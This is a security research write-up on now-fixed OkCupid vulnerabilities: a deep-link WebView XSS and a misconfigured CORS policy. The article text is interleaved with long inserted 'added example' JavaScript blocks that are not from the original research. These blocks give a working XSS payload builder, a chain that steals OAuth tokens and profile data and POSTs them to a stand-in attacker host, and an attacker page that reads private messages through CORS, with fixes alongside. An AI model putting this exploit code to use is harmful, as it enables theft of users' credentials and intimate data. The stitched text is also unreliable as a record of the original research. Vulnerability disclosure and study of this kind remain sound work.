No Actual Daters Harmed in This Exercise
Analysis by Alon Boxiner, Eran Vaknin
With more than 50 million registered users since its launch, the majority of them aged between 25 and 34, OkCupid is one of the most popular dating platforms globally. Conceived in 2004, when four friends from Harvard built the first free online dating service, it claims that more than 91 million connections are made through it annually and 50K dates every week, and in 2012 it became the first major dating site to release a mobile app.
Dating apps offer a comfortable, open and immediate way to connect with other people using the app. By sharing personal preferences in every area, and by applying the app’s matching algorithm, the app pairs users with like-minded people who can immediately start talking via instant messaging.
To create all of these connections, OkCupid builds a personal profile for each of its users, so that it can find the best match, or matches, based on each user’s valuable private information.
Of course, these detailed personal profiles are not only of interest to prospective love matches. They are also highly prized by hackers, because they are the ’gold standard’ of data either for use in targeted attacks or for selling on to other hacking groups: they make an attack attempt very convincing to an unsuspecting target.
As our researchers have uncovered vulnerabilities in other popular social media platforms and apps, we decided to look at the OkCupid app and see whether we could find anything that matched our interests. We found several things that led us into a deeper relationship (purely professional, of course). The vulnerabilities we found and have described in this research could have allowed attackers to:
- Expose users’ sensitive data stored in the application.
- Perform actions on behalf of the victim.
- Steal users’ profile and private data, preferences and characteristics.
- Steal users’ authentication tokens, user IDs and other sensitive information such as email addresses.
- Send the collected data to the attacker’s server.
Check Point Research informed OkCupid’s developers about the vulnerabilities exposed in this research, and a fix was responsibly deployed to ensure its users can safely continue using the OkCupid app.
OkCupid added: “Not a single user was impacted by the potential vulnerability on OkCupid, and we were able to fix it within 48 hours. We’re grateful to partners like Checkpoint who, with OkCupid, put the security and privacy of our users first.”
Mobile Platform
We started our research by reverse engineering the OkCupid Android mobile application (v40.3.1 on Android 6.0.1). During the reversing process, we found that the application opens a WebView (with JavaScript enabled in the context of the WebView window) and loads remote URLs such as https://OkCupid.com, https://www.OkCupid.com, https://OkCupid.onelink.me and more.
Deep links help attackers’ intents
While reverse engineering the OkCupid application, we found that it supports “deep links”, which allow intents in the application to be invoked from a browser link.
The intents the application listens for are the “https://OkCupid.com” schema, the custom “OkCupid://” schema and several more schemas:
An attacker can send a custom link that uses the schemas mentioned above. When the custom link contains the “section” parameter, the mobile application opens a WebView (browser) window inside the OkCupid mobile application. Any request made from that window is sent with the user’s cookies.
For demonstration purposes, we used the following link:
The mobile application opens a WebView (browser) window with JavaScript enabled.
Reflected Cross-Site Scripting (XSS)
As our research continued, we discovered that OkCupid’s main domain, https://www.OkCupid.com, is vulnerable to a reflected XSS attack.
The injection point for the XSS attack is located in the user settings functionality.
Retrieving the user’s profile settings is done with an HTTP GET request sent to the following path:
The section parameter is injectable, and an attacker could use it to inject malicious JavaScript code.
For the purpose of demonstration, we popped a simple alert window. Note: as mentioned above, the mobile application opens a WebView window, so the XSS executes in the context of a user authenticated to the OkCupid mobile application.
Sensitive Data Exposure & Performing Actions on Behalf of the Victim
Up to this point, we were able to launch the OkCupid mobile application with a deep link, OkCupid://, containing malicious JavaScript code in the section parameter. The following screenshot shows the final XSS payload, which loads jQuery and then loads JavaScript code from the attacker’s server (note that the upper part shows the XSS payload and the lower part is the same payload with URL encoding applied):
The following screenshot shows an HTTP GET request containing the final XSS payload (section parameter):
The server reflects the payload sent in the section parameter, and the injected JavaScript code is executed in the context of the WebView.
As mentioned before, the final XSS payload loads a script file from the attacker’s server. The loaded JavaScript code can be used for exfiltration and for acting on the account, and contains 3 functions:
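The deep link and the reflected section parameter described above, as an added example that is not code from the original research: a deep link whose section parameter carries a URL-encoded payload, a settings handler that reflects section into the page unescaped (the vulnerable behaviour), and the same handler with HTML escaping applied. The attacker host, the deep-link path, the page template and the exact payload are assumptions for illustration; the page shows neither the real settings path nor the real payload text.

```javascript
// Added example: deep link -> reflected `section` parameter -> XSS.
// The attacker host, the settings path, the template and the payload text
// are assumptions; the real ones are not reproduced on the page.
const ATTACKER_HOST = "https://attacker.example";   // assumption

// Payload shape described on the page: load jQuery, then load a script
// from the attacker's server (wording of the real payload is not shown).
const XSS_PAYLOAD =
  `<script src="${ATTACKER_HOST}/jquery.js"></script>` +
  `<script src="${ATTACKER_HOST}/payload.js"></script>`;

// Build the deep link the mobile app listens for. The app forwards the
// `section` parameter into its WebView, so the payload is URL-encoded once
// here and decoded when the settings page is requested.
function buildDeepLink(section, scheme = "OkCupid://") {
  // Assumed deep-link shape: <scheme>settings?section=<encoded payload>
  return `${scheme}settings?section=${encodeURIComponent(section)}`;
}

// Recover the `section` value the way a query-string parser would.
function extractSection(link) {
  const query = link.slice(link.indexOf("?") + 1);
  return new URLSearchParams(query).get("section");
}

// Vulnerable settings page: reflects `section` into the HTML verbatim.
function renderSettingsVulnerable(section) {
  return `<html><body><div id="section">${section}</div></body></html>`;
}

// Minimal HTML entity escaping for text nodes and attribute values.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened settings page: same template, output-encoded value.
function renderSettingsFixed(section) {
  return `<html><body><div id="section">${escapeHtml(section)}</div></body></html>`;
}

// Does the rendered page contain an executable script tag for the attacker's code?
function containsAttackerScript(html) {
  return html.includes(`<script src="${ATTACKER_HOST}/payload.js">`);
}

// End-to-end: build the link, parse it as the app/server would, render both ways.
function demo() {
  const link = buildDeepLink(XSS_PAYLOAD);
  const section = extractSection(link);
  return {
    link,
    roundTripped: section === XSS_PAYLOAD,
    vulnerable: containsAttackerScript(renderSettingsVulnerable(section)),
    fixed: containsAttackerScript(renderSettingsFixed(section)),
  };
}
```

Because the WebView has JavaScript enabled and sends the user’s cookies, the reflected script runs as the logged-in user; output encoding at the reflection point (renderSettingsFixed) is what removes the injection regardless of how the link reached the app.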
- Steal_token – steals the user’s authentication token, oauthAccessToken, and the user’s id, userId. Sensitive user information (PII), such as the email address, is exfiltrated as well.
- Steal_data – steals the user’s profile and private data, preferences, characteristics (e.g. answers given during registration) and more.
- Send_data_to_attacker – sends the data gathered by functions 1 and 2 to the attacker’s server.
Steal_token function:
The function makes an API call to the server. The user’s cookies are sent with the request because the XSS payload is executed in the context of the application’s WebView.
The server responds with a large JSON document containing the user’s id and the authentication token:
Steal_data function:
The function makes an HTTP request to the https://www.OkCupid.com:443/graphql endpoint.
Based on the data exfiltrated by the steal_token function, the request is sent with the authentication token and the user’s id.
The server responds with all of the victim’s profile information, including email, sexual orientation, height, family status, etc.
Send_data_to_attacker function:
The function makes a POST request to the attacker’s server containing all the information retrieved by the previous functions (steal_token and steal_data).
The following screenshot shows an HTTP POST request sent to the attacker’s server. The request body contains all of the victim’s sensitive information:
Performing actions on behalf of the victim is also possible thanks to the exfiltration of the victim’s authentication token and user id. This information is used in the malicious JavaScript code in the same way as in the steal_data function.
An attacker can perform actions such as sending messages and changing profile data using the information exfiltrated by the steal_token function:
- The authentication token, oauthAccessToken, is used in the Authorization header (as the bearer value).
- The user id, userId, is added where required.
Note: an attacker cannot perform a full account takeover because the cookies are protected with the HttpOnly flag.
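The three payload functions described above, reconstructed as an added example (not the researchers’ own code) with a pluggable fetch implementation so the chain runs offline: stealToken reads oauthAccessToken and userId from the authenticated API response, stealData sends a GraphQL request with the token as a bearer value and the user id, and sendDataToAttacker POSTs everything collected to the attacker. The URL of the token-returning call, the GraphQL query text, the JSON layouts, the attacker host and the constructed responses are assumptions; the page confirms only the key names, the /graphql endpoint and the use of the bearer Authorization header.

```javascript
// Added example reconstructing the exfiltration chain described on the page.
// Endpoint shapes, JSON layouts and the attacker host are assumptions.
const API_TOKEN_URL = "https://www.OkCupid.com/api/bootstrap";   // assumed URL
const GRAPHQL_URL = "https://www.OkCupid.com:443/graphql";        // from the page
const ATTACKER_URL = "https://attacker.example/collect";          // assumed host

// Pull the values the rest of the chain needs (assumed key locations).
function extractCredentials(json) {
  const { oauthAccessToken, userId, email } = json;
  if (!oauthAccessToken || !userId) throw new Error("token or user id missing");
  return { oauthAccessToken, userId, email };
}

// Step 1: the payload runs inside the app's WebView, so the request carries
// the session cookies and the response includes the token and user id.
async function stealToken(fetchImpl) {
  const res = await fetchImpl(API_TOKEN_URL, { credentials: "include" });
  return extractCredentials(await res.json());
}

// Step 2: authenticated GraphQL request using the stolen bearer token.
function buildGraphqlRequest({ oauthAccessToken, userId }) {
  return {
    url: GRAPHQL_URL,
    init: {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
        "Authorization": `Bearer ${oauthAccessToken}`,
      },
      // Query text is a placeholder; the real query is not on the page.
      body: JSON.stringify({
        query: "query($id: ID!) { user(id: $id) { email orientation height } }",
        variables: { id: userId },
      }),
    },
  };
}

async function stealData(fetchImpl, creds) {
  const { url, init } = buildGraphqlRequest(creds);
  return (await fetchImpl(url, init)).json();
}

// Step 3: ship everything collected to the attacker's server.
function buildExfilRequest(collected) {
  return {
    url: ATTACKER_URL,
    init: {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(collected),
    },
  };
}

async function sendDataToAttacker(fetchImpl, collected) {
  const { url, init } = buildExfilRequest(collected);
  return fetchImpl(url, init);
}

async function runChain(fetchImpl) {
  const creds = await stealToken(fetchImpl);
  const profile = await stealData(fetchImpl, creds);
  await sendDataToAttacker(fetchImpl, { creds, profile });
  return { creds, profile };
}

// Offline stand-in for fetch returning constructed responses, so the chain
// can be exercised with no network access. `log` records every request.
function makeFakeFetch(log = []) {
  return async (url, init = {}) => {
    log.push({ url, init });
    const body = url === API_TOKEN_URL
      ? { oauthAccessToken: "tok_constructed", userId: "12345", email: "victim@example.org" }
      : url === GRAPHQL_URL
        ? { data: { user: { email: "victim@example.org", orientation: "n/a", height: 180 } } }
        : { ok: true };
    return { ok: true, json: async () => body };
  };
}
```

Running runChain with a real fetch inside the WebView would produce exactly the three requests the page describes; the HttpOnly cookies never become readable to the script, which is why the token and user id, not the cookies, are what gets exfiltrated.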
Web Platform Vulnerabilities
Misconfigured Cross-Origin Resource Sharing Policy Leads to Sensitive Information Exposure
During the research, we found that the CORS policy of the API server api.OkCupid.com is not configured correctly: any origin can send requests to the server and read its responses. The following is a request sent to the API server from the origin https://OkCupidmeethehacker.com:
The server does not validate the origin properly and responds with the requested information. Moreover, the server response contains the headers Access-Control-Allow-Origin: https://OkCupidmeethehacker.com and Access-Control-Allow-Credentials: true:
From this point on, we knew that we could send requests to the API server from our domain (OkCupidmeethehacker.com) without being blocked by the CORS policy.
As soon as a victim who is authenticated to the OkCupid application browses to the attacker’s web application (https://OkCupidmeethehacker.com), an HTTP GET request is sent to https://api.OkCupid.com/1/native/bootstrap carrying the victim’s cookies. The server’s response includes a large JSON document containing the victim’s authentication token (oauth_accesstoken) and the victim’s user_id.
We were able to find more useful data in the bootstrap API endpoint, namely sensitive API endpoints on the API server:
The following screenshot shows exfiltration of sensitive PII data from the /profile/ API endpoint, using the victim’s user_id and access_token:
The following screenshot shows exfiltration of the victim’s messages from the /1/messages/ API endpoint, using the victim’s user_id and access_token:
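The CORS misconfiguration described in this section, as an added example that is not part of the original research: the reflecting policy the page describes beside an allowlisted replacement, the browser-side rule that decides whether a credentialed cross-origin response is readable, and the credentialed request the attacker’s page makes to the bootstrap endpoint. The first-party allowlist, the response layout and how the token is attached to the /profile/ and /1/messages/ calls are assumptions; the page gives only the origins, the endpoints and the key names oauth_accesstoken and user_id.

```javascript
// Added example modelling the CORS issue described on the page.
// The allowlist, the response layout and the token transport are assumptions.
const API_ORIGIN = "https://api.OkCupid.com";
const ATTACKER_ORIGIN = "https://OkCupidmeethehacker.com";   // from the page

// Vulnerable behaviour: the API reflects whatever Origin it receives and
// also allows credentials, so any site can read authenticated responses.
function corsHeadersReflecting(requestOrigin) {
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Corrected behaviour: only an explicit allowlist of first-party origins is
// echoed back; any other origin gets no CORS headers at all.
const ALLOWED_ORIGINS = new Set(["https://www.OkCupid.com", "https://OkCupid.com"]); // assumed
function corsHeadersAllowlisted(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",   // keep caches from serving one origin's headers to another
  };
}

// Browser rule for a credentialed cross-origin request: the response is
// readable only if ACAO equals the page origin exactly (never "*") and
// ACAC is literally "true".
function browserCanRead(responseHeaders, pageOrigin) {
  return responseHeaders["Access-Control-Allow-Origin"] === pageOrigin &&
         responseHeaders["Access-Control-Allow-Credentials"] === "true";
}

// Apply a server policy to a page origin and return the browser's verdict.
function crossOriginReadable(policy, pageOrigin) {
  return browserCanRead(policy(pageOrigin), pageOrigin);
}

// What the attacker's page does once a logged-in victim visits it: a
// credentialed fetch to the bootstrap endpoint, then the profile and
// messages endpoints with the returned token and user id.
async function exfiltrateViaCors(fetchImpl) {
  const boot = await (await fetchImpl(`${API_ORIGIN}/1/native/bootstrap`,
                                      { credentials: "include" })).json();
  const token = boot.oauth_accesstoken;   // key names from the page
  const userId = boot.user_id;
  const auth = { headers: { Authorization: `Bearer ${token}` } };   // transport assumed
  const profile = await (await fetchImpl(`${API_ORIGIN}/profile/${userId}`, auth)).json();
  const messages = await (await fetchImpl(`${API_ORIGIN}/1/messages/?userid=${userId}`, auth)).json();
  return { token, userId, profile, messages };
}

// Constructed stand-in for fetch so the attacker page logic runs offline.
function fakeApiFetch(url) {
  const body = url.endsWith("/1/native/bootstrap")
    ? { oauth_accesstoken: "at_constructed", user_id: "987" }
    : url.includes("/profile/") ? { email: "victim@example.org" } : { messages: [] };
  return Promise.resolve({ json: async () => body });
}
```

The browser only enforces the rule in browserCanRead; it is the server’s reflected Access-Control-Allow-Origin plus Access-Control-Allow-Credentials: true that turns a logged-in visit to the attacker’s site into readable API responses, which is why the fix belongs in the origin check on the server rather than anywhere in the client.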